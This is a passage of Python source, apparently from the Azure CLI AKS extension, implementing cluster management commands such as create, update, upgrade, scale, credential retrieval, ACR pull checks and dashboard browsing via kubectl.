err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
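# Sketch of the role scopes produced above (the subscription id and group name are hypothetical):
#
#   _build_role_scope(None, None, 'SUB-ID')
#   # -> '/subscriptions/SUB-ID'
#   _build_role_scope('my-rg', None, 'SUB-ID')
#   # -> '/subscriptions/SUB-ID/resourceGroups/my-rg'
#   _build_role_scope('my-rg', '/subscriptions/SUB-ID', 'SUB-ID')
#   # -> CLIError: the resource group is redundant when an explicit scope is supplied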
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cmd, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
return_msg = None
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning(
"There is a known issue for Kubernetes versions < 1.17.14 when connecting to "
"ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for"
"more information."
)
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
"--namespace=default",
]
            # Support kubectl versions < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
if output:
print(output)
# only return the output in test case "test_aks_create_attach_acr"
test_hook_data = get_cmd_test_hook_data("test_aks_create_attach_acr.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("returnOutput", False):
return_msg = output
else:
raise AzureInternalError("Failed to check the ACR.")
finally:
os.close(fd)
return return_msg
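# Sketch of the probe that aks_check_acr launches above (the pod name suffix is a random UUID and the
# image comes from the CONST_CANIPULL_IMAGE constant defined elsewhere in this module):
#
#   kubectl run --kubeconfig <temp kubeconfig> --rm --quiet --image <canipull image> \
#       --overrides '<overrides JSON above>' -it canipull-<uuid> --namespace=default
#
# On kubectl < 1.18 the legacy '--generator=run-pod/v1' flag is appended to the command.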
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise FileOperationError('Can not find kubectl executable in PATH')
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--output",
"name",
"--selector",
"k8s-app=kubernetes-dashboard",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--selector",
"k8s-app=kubernetes-dashboard",
"--output",
"jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
# output format: "'{port}'"
dashboard_port = int((dashboard_port.replace("'", "")))
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post(
"http://localhost:8888/openLink/{0}".format(term_id),
json={"url": dashboardURL},
)
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("enableTimeout", False):
timeout = test_configs.get("timeoutInterval", None)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(
[
"kubectl",
"--kubeconfig",
browse_path,
"proxy",
"--address",
listen_address,
"--port",
listen_port,
],
universal_newlines=True,
stderr=subprocess.STDOUT,
timeout=timeout,
)
except subprocess.CalledProcessError as err:
                if err.output.find('unknown flag: --address') != -1:
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.CalledProcessError as new_err:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
new_err, new_err.output
)
)
else:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
err, err.output
)
)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
finally:
os.close(fd)
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
auto_upgrade_channel=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
disable_public_fqdn=False,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
disable_local_accounts=False,
enable_fips_image=False,
no_wait=False,
yes=False,
enable_azure_rbac=False,
aks_custom_headers=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from .decorator import AKSCreateDecorator
aks_create_decorator = AKSCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_default_mc_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc(mc)
# pylint: disable=line-too-long
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
# pylint: disable=line-too-long
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False,
enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = False
if instance.service_principal_profile.client_id == "msi":
msi_auth = True
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation,
rotation_poll_interval=rotation_poll_interval,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if msi_auth:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
aad_route=True,
create_dcr=True,
create_dcra=True)
else:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
        # For the monitoring addon, the Metrics role assignment is not required when MSI auth is used
if enable_monitoring and not enable_msi_auth_for_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
            # MDM metrics are supported only in the Azure Public cloud, so add the role assignment only in that cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
            # All agent pools reside in the same vnet; a vnet-level Contributor role is granted
            # in a later function, so using any agent pool here is fine
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
            # Otherwise the cluster is not using a custom VNet; the permission is already granted
            # in the AKS RP, so there is nothing to handle on the client side.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None, public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
    # Check if the KUBECONFIG environment variable is set.
    # If path differs from the default, -f/--file was passed,
    # in which case we ignore the KUBECONFIG variable.
    # KUBECONFIG can be colon-separated; if so, use the first entry.
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"].split(":")[0]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify a node pool name, or use the "az aks nodepool" command to scale a node pool.')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
no_uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
windows_admin_password=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
disable_local_accounts=False,
enable_local_accounts=False,
yes=False,
no_wait=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
tags=None,
nodepool_labels=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
aks_custom_headers=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from .decorator import AKSUpdateDecorator
aks_update_decorator = AKSUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# update mc profile
mc = aks_update_decorator.update_default_mc_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc(mc)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. '
                       'If you only want to upgrade the node image version, please use "--node-image-only".')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This is only a client-side convenience so customers can run az aks upgrade to upgrade all
        # node pools of a cluster. The SDK only supports upgrading a single node pool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. A node-image-only upgrade '
                               'can only be applied to a VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name,
snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
headers=headers)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
    # If this cluster has Azure AD enabled, pass the user token so the command
    # also executes under the current user's identity.
    # Here we acquire a token for the AKS managed server AppID (same id for all clouds).
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.begin_run_command(
resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
    # cli_ctx.data['safe_params'] contains the list of parameter names the user typed, without values.
    # CLI core also uses this to calculate the ParameterSetName header for all HTTP requests from the CLI.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
    # The user didn't specify an output format, so we can customize the output for the best experience.
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
